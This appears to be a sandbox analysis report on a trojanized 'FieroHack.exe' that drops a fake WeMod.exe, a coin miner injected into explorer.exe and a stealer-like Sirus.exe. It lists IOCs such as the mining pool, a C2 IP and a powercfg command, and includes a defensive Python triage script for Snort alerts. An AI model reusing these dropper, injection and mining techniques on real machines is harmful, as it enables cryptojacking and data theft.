      Source: C:\Users\user\Desktop\FieroHack.exe; Code function 0_2_004027A1: FindFirstFileA
      Source: C:\Users\user\Desktop\FieroHack.exe; Code function 0_2_004058BF: GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B1298: 4x nop then cmp dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B5E20: 4x nop then jmp 025B5E56h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B7EB8: 4x nop then jmp 025B7F25h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B1297: 4x nop then cmp dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B10D4: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B10E0: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B5E10: 4x nop then jmp 025B5E56h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_025B7EB4: 4x nop then jmp 025B7F25h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_053993C9: 4x nop then mov ecx, dword ptr [ebp-38h]
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_05395F54: 4x nop then mov ecx, dword ptr [ebp-38h]
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_05BF1718: 4x nop then jmp 05BF1744h
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Code function 7_2_05BF1708: 4x nop then jmp 05BF1744h

      Networking

      Source: Traffic; Snort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.4:57509 -> 1.1.1.1:53
      Source: C:\Windows\explorer.exe; Network Connect: 141.94.96.144 9000
      Source: global traffic; TCP traffic: 192.168.2.4:49742 -> 141.94.96.144:9000
      Source: Joe Sandbox View; IP Address: 141.94.96.144
      Source: Joe Sandbox View; ASN Name: DFN-Verein zur Foerderung eines Deutschen Forschungsnetzes e.V.
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
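The network evidence is small but specific: a Snort hit (SID 2047928) on the DNS lookup for pool.supportxmr.com, and the injected explorer.exe (PID 2736, the process where the XMRig Yara rule fired) opening TCP 141.94.96.144:9000. Port 9000 is simply what this operator configured; stratum pools listen on whatever port they like, so a port list alone is a weak detection. The block below is an added example, not from the report or from Joe Sandbox: it parses a Snort fast-format alert line, re-fangs the domain out of the ET rule message, and flags outbound TCP from Windows shell and service-host binaries to non-web ports on public addresses, which is the shape of the explorer.exe connection regardless of port. The alert line and the connection records are constructed from the values in this section; the gid/rev fields and the second, benign record are assumptions.

```python
import ipaddress
import re
from datetime import datetime

# Constructed Snort "fast" alert, built from the timestamp, SID, ports and
# classification shown in this report (gid 1 and rev 1 are assumptions).
SNORT_FAST = (
    "06/30/24-01:34:52.402369  [**] [1:2047928:1] ET TROJAN CoinMiner Domain in DNS Lookup "
    "(pool .supportxmr .com) [**] [Classification: A Network Trojan was detected] "
    "[Priority: 1] {UDP} 192.168.2.4:57509 -> 1.1.1.1:53"
)

FAST_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]+)\]\s+)?"
    r"(?:\[Priority:\s*(?P<prio>\d+)\]\s+)?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def refang(msg: str):
    """'(pool .supportxmr .com)' -> 'pool.supportxmr.com'; ET messages de-fang with spaces."""
    m = re.search(r"\(([^)]*)\)", msg)
    return re.sub(r"\s*\.\s*", ".", m.group(1)).strip() if m else None


def parse_fast_alert(line: str):
    """Parse one Snort fast-format line into a dict, or None if it is not one."""
    m = FAST_RE.match(line.strip())
    if not m:
        return None
    a = m.groupdict()
    a["ts"] = datetime.strptime(a["ts"], "%m/%d/%y-%H:%M:%S.%f")
    for k in ("gid", "sid", "rev", "sport", "dport", "prio"):
        a[k] = int(a[k]) if a[k] is not None else None
    a["domain"] = refang(a["msg"])
    return a


# Binaries that have no business opening TCP to arbitrary public ports. svchost.exe
# does talk to 80/443 for updates and BITS, which the port check leaves alone.
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe"}
WEB_PORTS = {80, 443}

# Constructed endpoint connection records: the first is the explorer.exe connection
# in this report, the second is an assumed benign control (SMB to a private host).
CONN_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "pid": 2736, "proto": "tcp",
     "src": "192.168.2.4", "sport": 49742, "dst": "141.94.96.144", "dport": 9000},
    {"image": r"C:\Windows\explorer.exe", "pid": 2736, "proto": "tcp",
     "src": "192.168.2.4", "sport": 49750, "dst": "192.168.2.1", "dport": 445},
]


def system_process_egress(conns):
    """Shell/service-host binary talking TCP to a public IP on a non-web port."""
    out = []
    for c in conns:
        name = c["image"].rsplit("\\", 1)[-1].lower()
        dst = ipaddress.ip_address(c["dst"])
        if (name in SYSTEM_IMAGES and c["proto"] == "tcp"
                and dst.is_global and c["dport"] not in WEB_PORTS):
            out.append({"kind": "system_process_egress", "pid": c["pid"], "image": name,
                        "dst": c["dst"], "dport": c["dport"]})
    return out


def triage(alert_lines, conns):
    """Combine IDS alerts and endpoint connection records into one finding list."""
    findings = []
    for line in alert_lines:
        a = parse_fast_alert(line)
        if a and ("CoinMiner" in a["msg"] or (a["cls"] or "").startswith("A Network Trojan")):
            findings.append({"kind": "coinminer_dns", "sid": a["sid"], "domain": a["domain"],
                             "src": a["src"], "ts": a["ts"].isoformat()})
    findings.extend(system_process_egress(conns))
    return findings


if __name__ == "__main__":
    for f in triage([SNORT_FAST], CONN_EVENTS):
        print(f)
```

The DNS alert identifies the pool; the egress finding identifies the injected host process to collect from, which is why the Yara hit above is in explorer.exe memory and not in any dropped file.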
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,^q equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: `,^q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
      Source: global traffic; DNS traffic detected: DNS query: pool.supportxmr.com
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr; String found in binary or memory: http://crl.globalsign.net/Root.crl0
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: svchost.exe, 00000023.00000002.2205326641.0000020AFD28E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.dr; String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFCFD8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
      Source: edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFCFD8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFCFD8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD00D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.35.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: FieroHack.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: FieroHack.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.dr; String found in binary or memory: http://ocsp.sectigo.com0
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.carterandcone.coml
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fonts.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.goodfont.co.kr
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sakkal.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sandoll.co.kr
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.tiro.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.typography.netD
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ip.s
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ip.sb/ip
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://discord.com/api/v9/users/
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.dr; String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
      Source: edb.log.35.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
      Source: edb.log.35.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
      Source: edb.log.35.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, edb.log.35.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
      Source: edb.log.35.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.drString found in binary or memory: https://sectigo.com/CPS0
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_ff4f0cc2-1

      System Summary

Source: C:\Users\user\Desktop\FieroHack.exe File dump: WeMod.exe.0.dr 718354208
Source: C:\Users\user\AppData\Roaming\WeMod.exe File dump: leirdnhqqedj.exe.2.dr 718354208
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B21C0 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B21B8 NtQueryInformationProcess
Source: C:\Windows\System32\conhost.exe Code function: 67_2_0000000140001394 NtClose
Source: C:\Users\user\Desktop\FieroHack.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe File created: C:\Windows\TEMP\qkrjwvgkutvb.sys
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}\6796.obs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_xau403wb.ddt.ps1
Source: C:\Users\user\Desktop\FieroHack.exe Code function: 0_2_00406945
Source: C:\Users\user\Desktop\FieroHack.exe Code function: 0_2_0040711C
Source: C:\Users\user\AppData\Roaming\WeMod.exe Code function: 2_2_0000021E477C357A
Source: C:\Users\user\AppData\Roaming\WeMod.exe Code function: 2_2_0000021E477C052A
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B6380
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B60C0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B0A68
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B74C0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B9A70
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B7AD0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B7EB8
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B637F
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025BA798
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025BA7A8
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B0A59
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B8F08
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B9390
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B938C
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B9708
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B9707
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B9A5F
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B7AC0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_025B7EB4
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_0539D858
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05394104
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_0539CFD0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05396B70
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05396B61
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05BF18C0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05BF1D30
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05BF1D20
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05BF18B1
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05E1BF90
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05E17A30
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05E18B38
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05E16A49
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_05E17A50
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_076D89C0
Source: C:\Users\user\AppData\Roaming\Sirus.exe Code function: 7_2_076D80F8
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Code function: 43_2_00000238BC7E050A
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Code function: 43_2_00000238BC7E355A
Source: C:\Windows\System32\conhost.exe Code function: 67_2_0000000140003150
Source: C:\Windows\System32\conhost.exe Code function: 67_2_00000001400026E0
Source: Joe Sandbox View Dropped File: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\WeMod.exe D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
Source: C:\Users\user\AppData\Roaming\Sirus.exe Process token adjusted: Security
Source: FieroHack.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: qkrjwvgkutvb.sys.43.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.spyw.evad.mine.winEXE@98/19@1/2
Source: C:\Users\user\Desktop\FieroHack.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\FieroHack.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\FieroHack.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\FieroHack.exe File created: C:\Users\user\AppData\Roaming\WeMod.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WeMod.exe Mutant created: \Sessions\1\BaseNamedObjects\{5A846C8F-25997F09-44655D73-43ADF90D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2024:120:WilError_03
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Mutant created: \BaseNamedObjects\{A28E6C8F-DD8E7F09-3C6F5D73-8BB7F90D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
Source: C:\Users\user\Desktop\FieroHack.exe File created: C:\Users\user\AppData\Local\Temp\nsiD38E.tmp
Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Process created: C:\Windows\explorer.exe
Source: FieroHack.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
